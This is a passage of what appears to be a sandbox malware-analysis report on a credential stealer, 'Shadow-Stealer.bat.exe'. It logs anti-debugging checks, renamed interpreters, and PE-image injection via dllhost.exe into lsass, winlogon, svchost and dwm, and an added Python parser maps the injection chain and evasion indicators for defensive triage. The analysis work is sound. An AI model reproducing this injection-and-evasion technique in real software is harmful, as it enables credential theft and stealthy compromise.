            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2D7F10
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2DB5AC
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2E3228 SetUnhandledExceptionFilter,10_2_000001ACEA2E3228
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1800 SetUnhandledExceptionFilter,10_2_00007FF64E1D1800
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1ADC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF64E1D1ADC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002155A5BB5AC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5C3228 SetUnhandledExceptionFilter,13_2_000002155A5C3228
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5B7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002155A5B7F10
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7137F8FA4
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F93B0 SetUnhandledExceptionFilter,13_2_00007FF7137F93B0
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC77F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F5FDC77F10
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC83228 SetUnhandledExceptionFilter,19_2_000001F5FDC83228
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001F5FDC7B5AC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165E7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002D0165E7F10
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002D0165EB5AC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165F3228 SetUnhandledExceptionFilter,22_2_000002D0165F3228
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000002D6F151B5AC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1523228 SetUnhandledExceptionFilter,24_2_000002D6F1523228
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F1517F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000002D6F1517F10
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FD7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000014E41FD7F10
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FE3228 SetUnhandledExceptionFilter,25_2_0000014E41FE3228
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDB5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000014E41FDB5AC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B497F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D15B497F10
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B4A3228 SetUnhandledExceptionFilter,26_2_000001D15B4A3228
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49B5AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D15B49B5AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F9428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_009F9428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F6964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_009F6964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_009F667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A19428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00A19428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A16964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00A16964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A1667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00A1667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B19428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B19428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B16964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B16964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B1667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B1667A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B39428 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B39428
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B36964 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B36964
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B3667A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B3667A
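The anti-analysis entries above (DebugPort queries, fs:[30h] PEB reads, IsDebuggerPresent, the 922337203685477 ms thread delays, VMware and Hyper-V device strings) and the "Memory written ... value starts with: 4D5A" entries in the HIPS section that follows are easier to reason about as a process graph than as a flat list. The Python below is an added example for this page, not Joe Sandbox code and not part of the sample: it parses lines in the report's "Source: <src>; <kind>: <detail>" form (the separator is optional, so the fused form also parses), builds the injection chain from the writes that start with an MZ header, flags writes into lsass.exe, winlogon.exe, svchost.exe and dwm.exe, tallies the anti-analysis indicators and flags sources named like a renamed interpreter. The sample lines are copied from this report; CRITICAL_TARGETS, INTERPRETERS, the one-year sleep threshold, the VM string pattern and the "renamed interpreter" heuristic are the example's own assumptions.

```python
"""Parse Joe Sandbox 'Source: <src>; <kind>: <detail>' behaviour lines into a process-injection
graph and an anti-analysis tally. Added example for this page; it is not Joe Sandbox code."""
import re
from collections import Counter

# Constructed sample: entries copied from this report, one per line.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\cscript.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\$sxr-powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 28_2_009D0CE3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\$sxr-mshta.exe; Code function: 10_2_000001ACEA2D7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: dwm.exe, 0000001A.00000000.2491407917.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
"""

KINDS = ("Memory written", "Thread delayed", "Process queried", "Code function",
         "Binary or memory string", "API coverage", "Evasive API call chain", "File opened")
# The separator is optional, so the fused form ("...exeMemory written:") parses as well.
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*[;|]?\s*(?P<kind>%s):\s*(?P<detail>.*)$" % "|".join(KINDS))
WRITE_RE = re.compile(r"^(?P<target>.+?) base: [0-9A-Fa-f]+ value starts with: (?P<magic>[0-9A-Fa-f]+)$")

# Assumptions of this example, not Joe Sandbox definitions.
CRITICAL_TARGETS = {"lsass.exe", "winlogon.exe", "svchost.exe", "dwm.exe"}
INTERPRETERS = ("powershell.exe", "cmd.exe", "mshta.exe", "cscript.exe", "wscript.exe")
SLEEP_THRESHOLD_MS = 365 * 24 * 3600 * 1000  # delay assumed in ms; over a year means "never wake"
PEB_ACCESS = "fs:[00000030h]"                 # 32-bit PEB read behind BeingDebugged/NtGlobalFlag checks
VM_STRING_RE = re.compile(r"vmware|virtual_disk|hyper-v|vbox|qemu", re.I)

def basename(src):
    """'C:\\x\\foo.exe' or 'foo.exe, 00000018...sdmp' -> 'foo.exe'."""
    return src.split(",", 1)[0].strip().rsplit("\\", 1)[-1]

def parse(text):
    """Return (source, kind, detail) triples for every line in the report form."""
    hits = (LINE_RE.match(line.strip()) for line in text.splitlines())
    return [(m["src"], m["kind"], m["detail"].strip()) for m in hits if m]

def injection_edges(events):
    """(writer, target) pairs where a PE image (MZ header, 4D5A) was written into another process."""
    edges = set()
    for src, kind, detail in events:
        m = WRITE_RE.match(detail) if kind == "Memory written" else None
        if m and m["magic"].upper() == "4D5A":
            edges.add((basename(src), basename(m["target"])))
    return sorted(edges)

def injection_chains(edges, root):
    """Every writer -> target path from root, e.g. dropper -> dllhost.exe -> lsass.exe."""
    adj = {}
    for s, t in edges:
        adj.setdefault(s, []).append(t)
    chains = []
    def walk(node, path):
        for t in sorted(adj.get(node, [])):
            if t in path:                    # cycle guard: record the loop and stop
                chains.append(tuple(path + [t]))
            else:
                walk(t, path + [t])
        if not adj.get(node):
            chains.append(tuple(path))
    walk(root, [root])
    return chains

def critical_injection_targets(edges):
    return sorted({t for _, t in edges if t in CRITICAL_TARGETS})

def evasion_summary(events):
    """Count debugger checks, indefinite sleeps and VM-fingerprint strings."""
    tally = Counter()
    for _, kind, detail in events:
        if kind == "Process queried" and detail == "DebugPort":
            tally["debugger-check:DebugPort"] += 1
        elif kind == "Code function" and (PEB_ACCESS in detail or "IsDebuggerPresent" in detail):
            tally["debugger-check:code"] += 1
        elif kind == "Thread delayed":
            m = re.search(r"delay time:\s*(\d+)", detail)
            if m and int(m.group(1)) >= SLEEP_THRESHOLD_MS:
                tally["sleep-evasion"] += 1
        elif kind == "Binary or memory string" and VM_STRING_RE.search(detail):
            tally["vm-artifact"] += 1
    return tally

def renamed_interpreters(events):
    """Heuristic: a source named like a built-in interpreter plus a prefix (e.g. $sxr-powershell.exe)."""
    names = {basename(src) for src, _, _ in events}
    return sorted(n for n in names if any(n.lower().endswith(i) and n.lower() != i for i in INTERPRETERS))

if __name__ == "__main__":
    ev = parse(SAMPLE_LINES)
    edges = injection_edges(ev)
    for chain in injection_chains(edges, "Shadow-Stealer.bat.exe"):
        print(" -> ".join(chain))
    print("critical:", critical_injection_targets(edges), "evasion:", dict(evasion_summary(ev)),
          "renamed:", renamed_interpreters(ev))
```

On the sample this prints the chain Shadow-Stealer.bat.exe -> dllhost.exe -> {cscript.exe, lsass.exe, svchost.exe, winlogon.exe}, which is the two-hop pattern the report documents: the dropper and the renamed PowerShell write into dllhost.exe, and dllhost.exe then writes into privileged system processes. Basenames are used as graph nodes, so the System32 and SysWOW64 dllhost.exe instances collapse into one node; key on the full path instead if the x64/x86 split matters for your triage.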

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\$sxr-powershell.exe; Memory written: C:\Windows\SysWOW64\dllhost.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\dwm.exe base: 1D15B4C0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\cscript.exe base: 2DC0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D016610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F1540000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E428D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\dwm.exe base: 1D15B460000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D016670000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F15A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E42930000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\dwm.exe base: 1D15CAD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23AF3310000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23C9FDC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 1A1CA710000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D0166D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F1600000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E42990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\dwm.exe base: 1D15CB30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23AF3370000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23CA0490000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 1A1CA770000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\cscript.exe base: 9D0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D60000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1050000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\cscript.exe base: A30000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: D70000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: D80000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1070000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 1400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2D60000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 9E0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2950000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 2900000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: BA0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: A00000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 27D0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: F50000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 930000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\dllhost.exe; Memory written: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe base: 13A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\winlogon.exe base: 2D016730000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\lsass.exe base: 2D6F1660000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\svchost.exe base: 14E429F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe; Memory written: C:\Windows\System32\dwm.exe base: 1D15CB90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF33D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23CA04F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA7D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDEC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A2400000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 225966B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E67120000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A510000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 165829A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA29A0
            Source: C:\Windows\SysWOW64\dllhost.exe Thread created: C:\Windows\SysWOW64\cscript.exe EIP: 2DC2102
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 166129A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F15429A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 428D29A0
            Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B4629A0
            Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B29A0
